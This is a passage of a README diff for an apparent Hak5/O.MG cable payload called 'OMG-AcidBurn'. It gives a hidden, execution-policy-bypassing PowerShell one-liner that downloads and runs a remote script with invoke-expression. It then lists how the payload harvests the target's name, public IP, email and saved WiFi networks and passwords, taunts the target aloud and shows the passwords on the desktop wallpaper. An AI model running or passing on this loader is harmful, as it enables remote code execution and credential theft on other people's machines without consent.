I-Am-Jakoby/hak5-submissions/OMG-AcidBurn/README.md

 ```
 powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
 ```
+* Enumerate and get Full Name, Amount of RAM, Public IP, Wifi Password Length, Wifi Networks and Passwords, Day Password was last changed, Email
+* Custom responses have been programmed to roast the target based on the information gathered during enumeration phase
+* Wifi Networks and passwords will be generated into an image that will be saved on the desktop
+* Script will freeze until a mouse movement is detected
+* Sapi Speak will be used to speak out loud the custom responses
+* Desktop wallpaper will be changed to the image of the targets Wifi Networks and Passwords
+* Text file will be left on the target desktop with whatever message you choose

 <p align="right">(<a href="#top">back to top</a>)</p>

 ## Contributing